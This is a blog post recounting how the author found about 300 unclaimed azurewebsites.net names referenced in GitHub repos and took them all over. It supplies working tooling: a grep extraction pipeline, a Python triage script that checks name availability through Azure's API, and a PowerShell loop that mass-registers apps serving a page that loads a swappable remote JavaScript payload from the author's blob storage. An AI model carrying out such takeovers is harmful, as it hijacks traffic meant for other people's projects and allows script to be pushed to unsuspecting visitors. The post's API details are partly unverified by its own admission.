How I made 300 GitHub repos point to my blog using Azure subdomain takeover

Playing around in the Azure portal, I noticed that it is pretty easy to register and unregister an azurewebsites.net subdomain while deploying an application. The question that came to mind was: how many references to azurewebsites.net are out there that are no longer maintained and are available for takeover?

So I decided to look through GitHub repos, collect the URLs, check them, register them myself, and redirect the traffic to my own blog.

1. Find *.azurewebsites.net references

I didn’t feel like spending too much time on this PoC project, so I just intercepted the GitHub search request for “azurewebsites.net” in Burp and sent it to Intruder to iterate over all the result pages (around 75). This could probably have been done in a smarter way with the GitHub API and a token. Each page had about 10 references to Azure subdomains, so roughly 750 potential subdomain takeovers.

2. Collect ’em all

Once Intruder was done, I saved all the HTTP response bodies to a file and, using some grep-regex-bash-fu, extracted the hostnames (the third "/"-separated field of each URL, with any port stripped):

grep -Eo "https?://[a-zA-Z0-9./?=_%:-]*" azure_github.txt | grep -i azurewebsites | cut -d "/" -f 3 | cut -d ":" -f 1 | sort -u

3. Check availability

Not every subdomain I found was available for registration (either the repo owner or someone else still had it), so I used the Azure Portal's name-availability check to find out which ones I could take over. Again, this could have been done through the Azure API, but the quick-and-dirty approach worked just fine: I intercepted the portal's availability request in Burp and replayed it for each name I had found.

In the portal, a green check mark means the name is available and a red cross means it is already taken.

In the raw response, "nameAvailable":true is what indicates that the subdomain can still be registered.

I sent the request to Intruder, and once it had worked through the whole list of subdomains I was left with around 300 subdomains that are referenced in GitHub repos but are available for registration in the Azure Portal. Neat 😎
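As an added example for steps 1 to 3 (my code, not the tooling from the original post): a small Python script that pulls App Service names out of saved search output, drops the ones whose default hostname already resolves in DNS, and then asks the same question the portal asks through the Azure Resource Manager name-availability operation. The sample text, the subscription ID and token parameters and all function names are constructed for this example; the ARM endpoint path and api-version are written from the documentation as I recall it, so verify them against the current API reference before relying on them.

```python
# Added example (not the original post's tooling): extract *.azurewebsites.net
# app names from scraped text and triage them before touching the Azure Portal.
import json
import re
import socket
import urllib.request

AZURE_SUFFIX = ".azurewebsites.net"

# App Service names are 2-60 characters of letters, digits and hyphens. The default
# hostname is <name>.azurewebsites.net; the Kudu/SCM site at <name>.scm.azurewebsites.net
# belongs to the same app, so the optional ".scm" label is skipped over. The lookbehind
# and lookahead stop us from matching a hostname embedded in a longer label.
HOST_RE = re.compile(
    r"(?i)(?<![a-z0-9-])([a-z0-9][a-z0-9-]{0,58}[a-z0-9])(?:\.scm)?\.azurewebsites\.net(?![a-z0-9-])"
)

# Constructed sample input standing in for the saved Burp/GitHub response bodies.
SAMPLE_TEXT = """
See https://Contoso-Demo.azurewebsites.net/api/v1 and
http://contoso-demo.azurewebsites.net:80/health for the old API.
Kudu console: https://contoso-demo.scm.azurewebsites.net/DebugConsole
Another one: "legacy-portal.azurewebsites.net" (no longer maintained)
Not app names: -bad.azurewebsites.net, notazurewebsites.net, foo.example.net
"""


def extract_app_names(text):
    """Return the sorted, de-duplicated App Service names referenced in text."""
    return sorted({m.group(1).lower() for m in HOST_RE.finditer(text)})


def resolves(app_name):
    """Cheap unauthenticated pre-filter: does <name>.azurewebsites.net resolve?

    A name that resolves is taken, so skip it. A name that does not resolve is only
    a candidate: Azure also refuses names that are reserved or recently deleted, so
    the authoritative answer is check_name_available() below.
    """
    try:
        socket.getaddrinfo(app_name + AZURE_SUFFIX, 443)
        return True
    except socket.gaierror:
        return False


def check_name_available(app_name, subscription_id, bearer_token):
    """Ask Azure Resource Manager what the portal asks (Microsoft.Web checknameavailability).

    Endpoint and api-version are as I recall them from the ARM docs (assumption).
    Get a token with: az account get-access-token --query accessToken -o tsv
    Returns the parsed JSON; its "nameAvailable" field is the verdict.
    """
    url = (f"https://management.azure.com/subscriptions/{subscription_id}"
           "/providers/Microsoft.Web/checknameavailability?api-version=2022-03-01")
    body = json.dumps({"name": app_name, "type": "Microsoft.Web/sites"}).encode()
    req = urllib.request.Request(url, data=body, method="POST", headers={
        "Authorization": f"Bearer {bearer_token}",
        "Content-Type": "application/json",
    })
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def triage(text, subscription_id=None, bearer_token=None):
    """Extract names, drop the ones that resolve, optionally confirm each with ARM.

    Without credentials this stops at the DNS pre-filter; with them, only names that
    ARM reports as nameAvailable are returned.
    """
    candidates = [n for n in extract_app_names(text) if not resolves(n)]
    if subscription_id is None or bearer_token is None:
        return candidates
    return [n for n in candidates
            if check_name_available(n, subscription_id, bearer_token).get("nameAvailable")]


if __name__ == "__main__":
    # Offline part only: extraction from the constructed sample.
    for name in extract_app_names(SAMPLE_TEXT):
        print(name + AZURE_SUFFIX)
```

Feed triage() the saved response bodies (or the raw GitHub API JSON) and keep the DNS step: it costs nothing, needs no Azure credentials, and removes most of the names before you spend authenticated ARM calls on them.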

4. Create a static web page

My first thought was to register each of these domains and redirect visitors to my own blog. I went with a simple static web page that redirects via JavaScript, since it needs little to no compute, which is what Azure charges for.

<!DOCTYPE html>
<html lang="en">
  <head>
  </head>
  <body>
    <script src="https://subdomainsjs.blob.core.windows.net/scripts/javascript.js"></script>
  </body>
</html>

5. Hosting the payload

I also created a Blob Storage container to host the JS payload, so that I can change it in one place and have every subdomain pick up the new version without redeploying.

6. Pew-Pew 🔫 Deploy

Once the HTML page and the payload were ready, I wrote a script that went through the list and registered each subdomain. Initially I used the Free service plan (F1), but that one is limited to 10 apps per plan, so I had to upgrade to the Basic plan (B3), which allows an unlimited number of apps (as long as they all fit in the plan's 10 GB of storage, which was not a problem here).

This costs around $80 a month, so I am still considering whether it is worth it (at least for the subdomains I found on GitHub).

PS E:\azure_subdomains\html-docs-hello-world> foreach($line in  Get-Content "..\subdomains_takeover.txt"){az webapp up --sku B3 --name $line --resource-group 0xpwnlab --plan 0xpwnserviceplan --location "West Europe" --html}
Taking over the domain and pushing the HTML redirect page

7. Results

Finally, after several hours of registering names and pushing HTML pages, my Azure Portal was full of App Services.

Shortly afterwards I started to see traffic coming in from these domains.

8. Conclusion

Did it work? Yes. Was it worth it? I wouldn’t say so. Most of these repos are old, unpopular or unknown hobby projects, so the amount of traffic gained is pretty low compared with the price of hosting the static pages on Azure. A better approach would be to use Google dorks and hunt for dead links on more popular websites.

For example, I found a (quite old) PDF of Microsoft documentation that references scientificwebsite.azurewebsites.net, which is available for registration.
